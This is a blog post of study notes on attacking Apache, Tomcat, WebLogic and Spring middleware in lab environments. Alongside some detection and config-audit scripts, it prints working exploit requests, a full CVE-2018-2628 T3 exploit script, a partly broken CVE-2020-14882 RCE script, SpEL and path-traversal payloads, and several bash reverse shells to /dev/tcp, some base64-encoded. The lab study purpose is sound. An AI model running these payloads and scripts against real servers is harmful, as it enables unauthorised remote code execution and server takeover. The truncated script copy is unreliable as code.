Posted by 大连全瓷种植牙齿制作中心 on 2024-5-16 20:11:38

Middleware Vulnerability Attack and Defense: Study Notes

Introduction

A study summary of some middleware that comes up often in interviews. The environments below are reproduced with vulhub and vulfocus respectively.
Apache

Apache file upload (CVE-2017-15715)

Description: Apache (transliterated as 阿帕奇) is the world's most widely used web server software. It runs on almost every widely used computing platform and, thanks to its portability and security, is one of the most popular web server programs. This vulnerability arose because, when fixing the first suffix-parsing flaw, Apache used a regular expression to match the suffix. When parsing PHP, xxx.php\x0A is treated as having a php suffix, which bypasses some servers' security policies.
The upload filter turns out to be a blacklist, so this is a blacklist bypass: using the encoder, append 0a after php. An 'a' is typed first so that it is convenient to change it to 0a in the hex view; the file then uploads and is executed as PHP.
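The regex anchoring problem behind CVE-2017-15715, shown as an added example (not code from the original post): in PCRE and Python alike, `$` also matches just before a trailing newline, so a handler rule like `\.php$` fires on `shell.php\n` while a naive exact-suffix upload blacklist lets that name through. Function and sample names are this example's own.

```python
import re

# Constructed sample filenames: a plain PHP file, the CVE-2017-15715 variant
# with a trailing newline (0x0a) after the extension, and a harmless image.
SAMPLES = ["shell.php", "shell.php\n", "photo.png"]

# Modelled on the pre-fix <FilesMatch \.php$> handler rule: '$' matches at the
# end of the string OR just before a final newline, so "shell.php\n" matches.
WEAK_HANDLER_RULE = re.compile(r"\.php$")

# Hardened anchor: Python's \Z (PCRE \z) matches only at the very end.
STRICT_HANDLER_RULE = re.compile(r"\.php\Z")


def handler_treats_as_php(name: str, strict: bool = False) -> bool:
    """Would the httpd handler rule route this filename to the PHP engine?"""
    rule = STRICT_HANDLER_RULE if strict else WEAK_HANDLER_RULE
    return rule.search(name) is not None


def naive_blacklist_allows(name: str) -> bool:
    """Typical application-side blacklist: exact suffix comparison only."""
    return not name.lower().endswith(".php")


def hardened_blacklist_allows(name: str) -> bool:
    """Reject names carrying control characters (newline included) and strip
    trailing whitespace before the suffix check, so the name the filter sees
    and the name the server stores can no longer differ."""
    if any(ord(ch) < 0x20 for ch in name):
        return False
    return naive_blacklist_allows(name.rstrip())


def mismatch(name: str) -> bool:
    """The dangerous combination: the upload filter lets the name through but
    the server's handler rule would still execute it as PHP."""
    return naive_blacklist_allows(name) and handler_treats_as_php(name)


def audit(names):
    """Return the sample names that slip through the naive filter yet execute."""
    return [n for n in names if mismatch(n)]


if __name__ == "__main__":
    for n in SAMPLES:
        print(repr(n), "executes:", handler_treats_as_php(n),
              "naive filter allows:", naive_blacklist_allows(n),
              "hardened filter allows:", hardened_blacklist_allows(n))
```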
Apache httpd parsing vulnerability

Check the configuration file: grep -rn "x-httpd-php"
The main cause of this vulnerability is this configuration file (the AddHandler line that maps x-httpd-php to any filename containing .php).
Apache SSI remote command execution vulnerability

When testing an arbitrary file upload vulnerability, the target server may not allow files with a php suffix to be uploaded. If the target server has SSI and CGI support enabled, we can upload an shtml file and use SSI syntax to execute arbitrary commands. Constraints: every Apache version with SSI and CGI support is affected; the default extensions are .stm, .shtm and .shtml.
CVE-2021-41773 directory traversal

Apache HTTP Server 2.4.49 and 2.4.50 contain a path traversal vulnerability in a change made to path normalization. An attacker can use it to read files outside the web root, such as system configuration files or website source code, and under certain conditions can craft requests that execute commands and take control of the server. The version matches, so the payload is:
curl -v --path-as-is http://192.168.48.144:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
CVE-2021-42013 RCE & directory traversal & file parsing

Apache HTTP Server 2.4.50's fix for CVE-2021-41773 was insufficient. An attacker can use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside these directories are not protected by the usual default configuration "require all denied", the requests may succeed. If CGI scripts are also enabled for these aliased paths, this can allow remote code execution. The issue affects only Apache 2.4.49 and 2.4.50, not earlier versions.

```http
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: 192.168.48.144:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
If-None-Match: "2d-432a5e4a73a80"
If-Modified-Since: Mon, 11 Jun 2007 18:53:14 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

echo;id
```
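An added detection example (not from the original post) for the two Apache CVEs above: it percent-decodes request paths repeatedly, as a lenient server would, and flags any request whose decoded path contains a `..` segment. That catches both the `.%2e/%2e%2e` form of CVE-2021-41773 and the double-encoded `.%%32%65` form of CVE-2021-42013, and generalizes to other double-encoded variants such as `%252e%252e`. The log lines, addresses and sizes are constructed.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines modelled on the requests in this section.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:00:00:01 +0000] "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1024',
    '10.0.0.5 - - [01/Jan/2024:00:00:02 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 55',
    '10.0.0.6 - - [01/Jan/2024:00:00:03 +0000] "GET /icons/apache_pb.gif HTTP/1.1" 200 2326',
    '10.0.0.7 - - [01/Jan/2024:00:00:04 +0000] "GET /console/images/%252e%252e/console.portal?_nfpb=true HTTP/1.1" 302 0',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_decode(path: str, max_rounds: int = 3):
    """Percent-decode until the string stops changing (bounded), returning the
    decoded path and the number of decoding rounds that were needed.
    unquote() leaves invalid escapes such as the lone '%' in '%%32%65' alone,
    which is exactly what turns '.%%32%65' into '.%2e' and then into '..'."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds


def analyse_target(target: str) -> dict:
    """Decode the request target (without its query string) and report whether
    it contains a '..' segment and whether more than one decode round was needed."""
    raw_path = target.split("?", 1)[0]
    decoded, rounds = fully_decode(raw_path)
    segments = decoded.split("/")
    return {
        "raw": raw_path,
        "decoded": decoded,
        "rounds": rounds,
        "traversal": ".." in segments,
        "double_encoded": rounds > 1,
    }


def scan_log(lines):
    """Return one finding per log line that shows traversal or double encoding."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        verdict = analyse_target(match.group("target"))
        if verdict["traversal"] or verdict["double_encoded"]:
            verdict.update(line=number, method=match.group("method"))
            findings.append(verdict)
    return findings


if __name__ == "__main__":
    for f in scan_log(LOG_LINES):
        print(f'line {f["line"]}: {f["method"]} {f["raw"]} -> {f["decoded"]} '
              f'(rounds={f["rounds"]}, traversal={f["traversal"]})')
```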
Tomcat

CVE-2017-12615 file upload

When a vulnerable Tomcat runs on a Windows/Linux host with the HTTP PUT method enabled (for example, the readonly init parameter changed from its default to false), an attacker can upload a JSP webshell containing arbitrary code through a crafted request; the malicious code in the JSP is then executed by the server, leading to data leakage or takeover of the server. A PUT arbitrary file upload vulnerability exists here, but one detail is worth noting: org.apache.jasper.servlet.JspServlet handles jsp and jspx requests by default and has no PUT upload logic, so it cannot handle PUT requests; org.apache.catalina.servlets.DefaultServlet handles static files (everything except jsp and jspx) by default and does have PUT upload handling, so it can handle PUT requests. So to upload a JSP file we need a bypass; this is effectively blacklist logic, and it can be bypassed using Windows filesystem quirks. Bypass by appending a slash:

```http
PUT /2.jsp/ HTTP/1.1
Host: 192.168.48.144:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 300
```

The three bypasses: a trailing /, %20, and xxx.jsp::$DATA. Then connect with the Behinder (冰蝎) webshell.
CVE-2020-1938 file inclusion

The Apache Tomcat AJP protocol (port 8009 by default) has an implementation flaw that leaves certain parameters attacker-controlled; by crafting specific parameters an attacker can read arbitrary files under the server's webapp directory. If the server also has a file upload feature, the attacker can combine this with file inclusion to achieve remote code execution. Affected product versions include: Tomcat 6.*, Tomcat 7.
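An added configuration audit (not the post's or Tomcat's own code) covering both Tomcat findings above: it reads a web.xml and a server.xml, reports a DefaultServlet with readonly=false (the PUT upload precondition of CVE-2017-12615) and an AJP connector reachable beyond loopback without a shared secret (the CVE-2020-1938 exposure), and shows why an extension check must strip the trailing `/`, `%20` and `::$DATA` tricks before deciding. Both XML fragments and the secret value are constructed.

```python
import xml.etree.ElementTree as ET
from urllib.parse import unquote

# Constructed web.xml fragment: DefaultServlet with readonly switched to false.
WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>debug</param-name><param-value>0</param-value></init-param>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>"""

# Constructed server.xml fragment: AJP connector on all interfaces, no secret.
SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def _local(tag: str) -> str:
    """Strip the XML namespace so tags can be compared by local name."""
    return tag.rsplit("}", 1)[-1]


def default_servlet_writable(web_xml: str) -> bool:
    """True if DefaultServlet is configured with readonly=false (PUT/DELETE allowed)."""
    for servlet in ET.fromstring(web_xml).iter():
        if _local(servlet.tag) != "servlet":
            continue
        fields = {_local(c.tag): (c.text or "").strip() for c in servlet}
        if fields.get("servlet-class") != "org.apache.catalina.servlets.DefaultServlet":
            continue
        for param in servlet:
            if _local(param.tag) != "init-param":
                continue
            kv = {_local(c.tag): (c.text or "").strip() for c in param}
            if kv.get("param-name") == "readonly" and kv.get("param-value", "").lower() == "false":
                return True
    return False


def ajp_findings(server_xml: str) -> list:
    """Report AJP connectors reachable beyond loopback or lacking a shared secret."""
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if not conn.get("protocol", "").upper().startswith("AJP"):
            continue
        port = conn.get("port", "?")
        address = conn.get("address", "0.0.0.0")  # Tomcat binds all interfaces when unset
        if address not in LOOPBACK:
            findings.append(f"AJP connector {port} bound to {address}: bind it to loopback or remove it")
        if not conn.get("secret"):
            findings.append(f"AJP connector {port} has no secret: set secret= and keep secretRequired=true")
    return findings


def normalize_upload_target(path: str) -> str:
    """Strip the suffix tricks used above (trailing '/', '%20' and '::$DATA') so the
    extension check sees the name Tomcat will actually store."""
    name = unquote(path)
    changed = True
    while changed:
        changed = False
        for suffix in ("/", " ", "::$DATA"):
            if name.endswith(suffix):
                name = name[: -len(suffix)]
                changed = True
    return name


def naive_blocks_jsp(method: str, path: str) -> bool:
    """Exact-suffix check: fooled by every bypass listed above."""
    return method == "PUT" and path.lower().endswith((".jsp", ".jspx"))


def hardened_blocks_jsp(method: str, path: str) -> bool:
    """Same check after normalization: the stored name is what gets tested."""
    return method == "PUT" and normalize_upload_target(path).lower().endswith((".jsp", ".jspx"))
```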
WebLogic deserialization (CVE-2018-2628)

This vulnerability is triggered through the T3 protocol and can lead to remote command execution. Affected versions:

[*]Weblogic 10.3.6.0
[*]Weblogic 12.1.3.0
[*]Weblogic 12.2.1.2
[*]Weblogic 12.2.1.3
What is the T3 protocol? T3 is the protocol used to transfer information between WebLogic servers and other types of Java programs. WebLogic keeps track of every Java virtual machine connected to an application; to carry traffic to a JVM, WebLogic creates a T3 connection. The connection maximizes efficiency by eliminating multiple protocols across the network, so it uses fewer operating system resources; the protocol used for T3 connections also minimizes packet size, increasing transfer speed. Visiting http://192.168.48.144:7001/ (port 7001) shows the same default page; like Spring Boot's default page, this can be used as a WebLogic fingerprint.
bash -i >& /dev/tcp/192.168.48.144/6677 0>&1 YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82Njc3IDA+JjE=
java -cp ysoserial-0.0.8-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82Njc3IDA+JjE=}|{base64,-d}|{bash,-i}'
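An added example (not from the post or the exploit script) that parses the T3 client handshake the exploit script below sends, and uses it to flag T3 connections to port 7001 from addresses not expected to speak T3. The hex constant is the one from the script; the flow records are constructed, and the allowlist of legitimate T3 clients is an assumption.

```python
import binascii

# The handshake string from the exploit script (hex). It decodes to
# "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n": protocol and version, then
# KEY:value lines, then a blank line.
T3_HANDSHAKE_HEX = "74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a"

T3_PORT = 7001  # the WebLogic listen port used in this write-up


def parse_t3_handshake(payload: bytes):
    """Return the fields of a T3/T3S client handshake, or None if the payload
    does not start like one."""
    if not (payload.startswith(b"t3 ") or payload.startswith(b"t3s ")):
        return None
    head = payload.split(b"\n\n", 1)[0]
    lines = head.decode("ascii", errors="replace").split("\n")
    protocol, _, version = lines[0].partition(" ")
    info = {"protocol": protocol, "version": version}
    for line in lines[1:]:
        key, sep, value = line.partition(":")
        if sep:
            info[key] = value
    return info


# Constructed flow records: (source address, destination port, first payload bytes).
# The first record carries the real handshake bytes decoded from the script.
FLOWS = [
    ("203.0.113.10", 7001, binascii.unhexlify(T3_HANDSHAKE_HEX)),
    ("10.0.0.8", 7001, b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"),
    ("203.0.113.11", 7001, b"GET /console/login/LoginForm.jsp HTTP/1.1\r\nHost: x\r\n\r\n"),
    ("10.0.0.9", 8080, b"GET / HTTP/1.1\r\n\r\n"),
]

# Assumed allowlist: hosts that legitimately open T3 connections (managed
# servers, admin workstations). Everything else speaking T3 is reported.
T3_ALLOWED_SOURCES = {"10.0.0.8"}


def t3_alerts(flows, allowed_sources=T3_ALLOWED_SOURCES):
    """List (source, version) for every T3 handshake from a non-allowlisted host."""
    alerts = []
    for source, dport, payload in flows:
        if dport != T3_PORT:
            continue
        info = parse_t3_handshake(payload)
        if info is None or source in allowed_sources:
            continue
        alerts.append((source, info["version"]))
    return alerts


if __name__ == "__main__":
    print(parse_t3_handshake(FLOWS[0][2]))
    print(t3_alerts(FLOWS))
```

Oracle's documented mitigation for the T3 deserialization issues is a WebLogic connection filter that denies t3/t3s from untrusted addresses; this detector is the complementary network-side check.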
CVE-2018-2628 EXP (Python 2):

```python
from __future__ import print_function

import binascii
import os
import socket
import sys
import time


def generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):
    # generates ysoserial payload
    command = 'java -jar {} {} {}:{} > payload.out'.format(path_ysoserial, jrmp_client, jrmp_listener_ip, jrmp_listener_port)
    print("command: " + command)
    os.system(command)
    bin_file = open('payload.out', 'rb').read()
    return binascii.hexlify(bin_file)


def t3_handshake(sock, server_addr):
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    print('handshake successful')


def build_t3_request_object(sock, port):
    data1 = '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'
    data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1, data2, data3, data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    print('send request payload successful,recv length:%d' % (len(sock.recv(2048))))


def send_payload_objdata(sock, data):
    payload = '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'
    payload += data
    payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s' % ('{:08x}'.format(len(payload) / 2 + 4), payload)
    sock.send(payload.decode('hex'))
    time.sleep(2)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception:
        pass
    return res


def exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(65)
    server_addr = (dip, dport)
    t3_handshake(sock, server_addr)
    build_t3_request_object(sock, dport)
    payload = generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)
    print("payload: " + payload)
    rs = send_payload_objdata(sock, payload)
    print('response: ' + rs)
    print('exploit completed!')


if __name__ == "__main__":
    # check for args, print usage if incorrect
    if len(sys.argv) != 7:
        print('\nUsage:\nexploit.py '
              ' \n')
        sys.exit()

    dip = sys.argv[1]
    dport = int(sys.argv[2])
    path_ysoserial = sys.argv[3]
    jrmp_listener_ip = sys.argv[4]
    jrmp_listener_port = sys.argv[5]
    jrmp_client = sys.argv[6]
    exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)
```

WebLogic unauthenticated RCE (CVE-2020-14882)

Affected versions: Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.

Payload for unauthenticated access to the admin console:

http://192.168.48.144:7001/console/images/%252E%252E%252Fconsole.portal?nfpb=true&pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

Unauthenticated RCE exploitation script: https://github.com/GGyao/CVE-2020-14882_ALL/blob/master/CVE-2020-14882_ALL.py (reproduced in part below; the banner text and the success branch of command() did not survive the copy):

```python
#coding:utf-8
import requests
import sys
import argparse
import http.client

http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

requests.packages.urllib3.disable_warnings()

# Function 1 helper: command execution with echoed output.
def command(url_cmd, headers_cmd, url):
    try:
        res = requests.get(url_cmd, headers=headers_cmd, timeout=15, verify=False)
        if ...:  # success check and result printing missing from the copy on this page
            ...
        else:
            print("[-] " + url + " not vulnerable or command error!")
    except Exception as e:
        #print (e)
        print("[-] " + url + " not vulnerable or command error!")

# Author:GGyao
# Github:(https://github.com/GGyao)

print(banner)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="Target URL; Example:http://ip:port。")
parser.add_argument("-f", "--file", help="Target File; Example:target.txt。")
parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
parser.add_argument("-x", "--xml", help="Remote XML file; Example:(http://vpsip/poc.xml;) ")
args = parser.parse_args()

# Function 1: command echo.
if args.url != None and args.cmd != None:
    url = args.url
    url_cmd = args.url + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""
    headers_cmd = {
    'User-Agent':'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
    'cmd':args.cmd,
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Content-Type':'application/x-www-form-urlencoded'
    }

    #post_cmd = """_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.WorkAdapter+adapter+%3d+((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()%3b+java.lang.reflect.Field+field+%3d+adapter.getClass().getDeclaredField("connectionHandler")%3bfield.setAccessible(true)%3bObject+obj+%3d+field.get(adapter)%3bweblogic.servlet.internal.ServletRequestImpl+req+%3d+(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj)%3b+String+cmd+%3d+req.getHeader("cmd")%3bString[]+cmds+%3d+System.getProperty("os.name").toLowerCase().contains("window")+%3f+new+String[]{"cmd.exe",+"/c",+cmd}+%3a+new+String[]{"/bin/sh",+"-c",+cmd}%3bif(cmd+!%3d+null+){+String+result+%3d+new+java.util.Scanner(new+java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\A").next()%3b+weblogic.servlet.internal.ServletResponseImpl+res+%3d+(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req)%3b+res.getServletOutputStream().writeStream(new+weblogic.xml.util.StringInputStream(result))%3bres.getServletOutputStream().flush()%3bres.getWriter().write("")%3b}')"""
    #command(url_cmd,post_cmd,headers_cmd,url)
    command(url_cmd,headers_cmd,url)

# Function 2: weblogic 12.x command execution.
if args.url != None and args.xml != None:
    url_cmd = args.url + '/console/images/%252e%252e/console.portal'
    headers_12 = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Content-Type':'application/x-www-form-urlencoded'
    }

    post_12 = """_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22{}%22)""".format(args.xml)

    weblogic_12(url_cmd,post_12,headers_12)

# Function 3: batch command echo.
if args.file != None and args.cmd != None:
    #print (1)
    for File in open(args.file):
      File = File.strip()
      url_cmd = File + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""
      print ("[*] >>> Test:" + File)

      url = File
      headers_cmd = {
      'User-Agent':'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
      'cmd':args.cmd,
      'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
      'Content-Type':'application/x-www-form-urlencoded'
      }
      command(url_cmd,headers_cmd,url)

if __name__ == "__main__":
    main()
```

Usage: python3 CVE-2020-14882.py -u http://192.168.48.144:7001 -c "whoami"
WebLogic RCE (CVE-2023-21839)

Vulnerability introduction: CVE-2023-21839 is a remote code execution vulnerability in WebLogic. Because of a flaw in the IIOP/T3 protocol, when IIOP/T3 is enabled an unauthenticated attacker with IIOP/T3 network access can attack a vulnerable WebLogic Server; successful exploitation may lead to the server being taken over, with operating system commands or code injected remotely. Start the JNDI server: java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.48.144 . Then attack with the tool from https://github.com/DXask88MA/Weblogic-CVE-2023-21839 : java -jar Weblogic-CVE-2023-21839.jar 192.168.48.144:7001 ldap://192.168.48.144:1389/Basic/ReverseShell/192.168.48.144/6666 . The reverse shell connects.
WebLogic weak password

The reproduction reads the password ciphertext and the encryption key file through an arbitrary file read, decrypts them, logs in with the recovered password, and gets a shell through the admin console's file upload. Reproduction: the arbitrary file read payload is hello/file.jsp?path= . The binary file SerializedSystemIni.dat is the key and config.xml holds the ciphertext. WebLogic passwords are AES-encrypted (older versions used DES), so once the key is found the ciphertext can be decrypted. Read the key with /hello/file.jsp?path=security/SerializedSystemIni.dat and save the bytes to a file; read the ciphertext with /hello/file.jsp?path=config/config.xml, which gives yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k= . Decrypt with the tool at https://github.com/TideSec/Decrypt_Weblogic_Password , which yields Oracle@123.
A brief summary of WebLogic: its fingerprint is the 404 page, and /console is reachable for login. Once in the admin console, a shell can be obtained by uploading a war package; WebLogic also has XMLDecoder deserialization and T3 deserialization, and an SSRF vulnerability that can be used to attack the internal network.
Spring

The Spring framework: Spring is a lightweight Java development framework, originally created by Rod Johnson, aimed at solving the coupling between the business logic layer and the other layers in enterprise application development. It is a layered JavaSE/JavaEE full-stack (one-stop) lightweight open-source framework that provides comprehensive infrastructure support for Java applications. Spring takes care of the infrastructure so Java developers can focus on the application itself. Spring Boot: Spring Boot is a rapid development framework that can quickly integrate third-party frameworks. How does it do that? Its basic principle is Maven dependency management: Maven integration, fully annotation-based configuration that simplifies XML, an embedded HTTP server (Tomcat or Jetty; Tomcat by default), and finally execution as a plain Java application. The difference between Spring Boot and Spring Cloud: Spring Cloud is a complete microservice solution framework with very powerful features: a registry, client-side invocation tools, service governance (load balancing, circuit breakers, a distributed configuration center, gateway, message bus and so on).
Sensitive information disclosure vulnerability

Just scan with a tool here: https://github.com/AabyssZG/SpringBoot-Scan . Usage: python3 SpringBoot-Scan.py -u "http://192.168.48.133:8080/" for information disclosure, and python3 SpringBoot-Scan.py -v "http://192.168.48.133:8080/" for vulnerability exploitation.
Spring Security OAuth (CVE-2016-4977)

Affected versions: Spring Security OAuth 2.3 to 2.3.2, 2.2 to 2.2.1, 2.1 to 2.1.1, 2.0 to 2.0.14. Log in with admin / admin, then request http://192.168.48.133:8080/oauth/authorize?response_type=${3*3}&client_id=acme&scope=openid&redirect_uri=http://test . The value of the response_type parameter is evaluated as a Spring SpEL expression. Reverse shell: bash -i >& /dev/tcp/your-ip/port 0>&1 ; base64 form: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82NjY1IDA+JjE=}|{base64,-d}|{bash,-i} . A payload generation script turns that command into a long SpEL chain of T(java.lang.Character).toString(...).concat(...) calls wrapped in ${T(java.lang.Runtime).getRuntime().exec(...)} (the full payload is omitted here). Replace the response_type value with the generated payload and send the request; the reverse shell connects.
Spring WebFlow remote code execution (CVE-2017-4971)

Spring WebFlow is a framework for developing flow-based applications (such as shopping logic) that separates the flow definition from the classes and views implementing the flow behaviour. In its 2.4.x versions, if we control the field during data binding, a SpEL expression injection results, ultimately leading to arbitrary command execution. Affected versions: Spring WebFlow 2.4.0 - 2.4.4. Visit http://192.168.48.133:8080/hotels/1 ; there is a default account and password. After logging in, click confirm and capture the request: the trigger point is here. Payload construction:
&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.48.144/6665+0>%261")).start()=vulhub
The reverse shell connects.
Spring Data REST remote command execution reproduction (CVE-2017-8046)

Principle: when a spring-data-rest server processes a PATCH request, an attacker can construct a malicious PATCH request whose crafted JSON data executes arbitrary Java code. Payload: the number array is generated like this:

```python
payload = b'touch /tmp/success'
bytecode = ','.join(str(i) for i in list(payload))
print(bytecode)
```

```http
PATCH /customers/1 HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 202

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]
```

